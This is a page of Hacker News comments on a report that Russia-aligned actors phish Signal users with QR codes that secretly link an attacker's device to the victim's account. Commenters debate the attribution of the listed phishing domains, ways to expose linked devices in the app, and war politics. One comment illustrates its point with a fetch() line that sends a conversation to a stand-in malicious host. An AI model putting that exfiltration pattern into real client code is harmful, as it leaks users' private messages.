Live data from Hacker News

Multiple Russia-aligned threat actors actively targeting Signal Messenger

cloud.google.com

211–220 of 329 posts

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#211
post #204

They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia. Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.

>signal-confirm[.]site is registered in Ukraine The WHOIS is usually fake made up data so don't know why you are using that to claim it's registered in Ukraine. Russia is also known to use stolen credentials, SIM cards etc. from their neighbouring countries, including Ukraine, for things like this.

Then why should I trust the article at all? If WHOIS data is fake and stolen credentials are common (which I don't disagree with), I could register a domain, put your name on it, and make it look like you're behind the phishing. Would that make it true? After all, in war, deception is a legitimate tactic.

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#212
post #112

You can check for unexpected linked devices in the settings menu.

I wonder if Signal should expose linked devices directly in the UI at all times. Something like a small icon that indicates "You have 3 linked devices active" or similar.

Would probably lead to notification fatigue.

Showing a big snackbar when a new device is added is probably enough, especially if the app can detect there was no "action" on your phone that triggered it.

Key transparency, once rolled out, would help to ensure there is no lingering "bad" device around, but phishing will always be a problem.

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#213

They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia. Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.

I believe you are making a mistake by thinking that since a malicious actor's domain is registered in Ukraine, it automatically must be doing something in the interests of Ukraine, or at least be known to its officials.

Lots of Russian state actors have no problems working from within Ukraine, alas. Add to this purely chaotic criminal actors who will go with the highest bidder, territories temporarily controlled by Russians that have people shuttle to Ukraine and back daily, and it becomes complicated very quickly.

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#214

Earlier quoted context omitted.

The article says they phish people into linking adversarial devices to their Signal: > [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]

There's a new feature to sync old messages that seems like it could potentially make that attack vector ten times worse: https://www.bleepingcomputer.com/news/security/signal-will-l... Would a malicious URL be able to activate this feature as part of the request?

Probably not, in any normal case a secondary device shouldn't have that kind of authority to dictate.

It is more concerning if the toggle is on by default and then you carelessly press next (on this or some other kind of phish).

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#215

"Russia-aligned threat actors" has a whole new meaning this last week.

[flagged]

I strongly agree - HN has become increasingly Redditified in the political discussion sense. I think this website has the potential to have (and often already has) some of the best serious discussion on the internet, so it really nags at me that people have eroded this standard a lot recently IMO.

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#216
One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean end of the day you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further to the OS that the rendering is done on.

The last bit adds an interesting facet, even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because its particularly tricky to load your own build of an application.

And then if you did that, you still need to do it all on the other side of the chat too, assuming its a multi party chat.

You can have every cute protocol known to man, best encryption algorithms on the wire, etc but end of the day its all trust.

I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.

Sometimes it all feels pointless (besides encrypted storage).

I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#218

Earlier quoted context omitted.

IME you say “Sorry I only use Signal” and either they change or you don’t get in contact with that person. If you change and abandon your principles were they really principles in the first place?

How do you tell that to them in the first place? You got someone's phone number. The person who gives it to you tells them that they use whatsapp. You can't even tell them "Sorry I only use Signal" unless you open whatsapp app.

Presumably at the time they've given you their phone number, they've told you that they are on WhatsApp, and then you've responded directly that you're only on Signal.

If there is a communications channel by which they can give you their phone number, you can use that same channel to discuss what messenger to use.

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#219

Earlier quoted context omitted.

[flagged]

Try to open news about USA-Russia latest talks. Basically Trump now is repeating propaganda topics from Russia Today, their fake claims about Ukraine. USA pushed Ukraine to give up nukes, offered security assurances instead. And then during full scale war donated just 30 old tanks. And now Trump is talking with Putin behind Ukraine's back on how they should surrender. Unfortunately USA is not a superpower anymore and…

> Unfortunately USA is not a superpower anymore and their word means nothing.

I wish this were true, and while Mr. Trump has dedicated himself to ripping up the world order, the US still has way too many nukes to not treat as a substantial power.

If the US isn't a superpower, I'm not sure there are any superpowers left.

Re: Multiple Russia-aligned threat actors actively targeting Signal Messenger

#220
post #84

Earlier quoted context omitted.

Awful shortsighted and uninformed viewpoint that has been beaten into the ground ad nauseum. Read a couple books. Privacy is a precondition to democracy.

What books would you recommend, that proof that connection? "Privacy is a precondition to democracy"

How would you convert an autocracy into a democracy without secrecy? There are no peaceful means so you have to plot.
Post reply on HN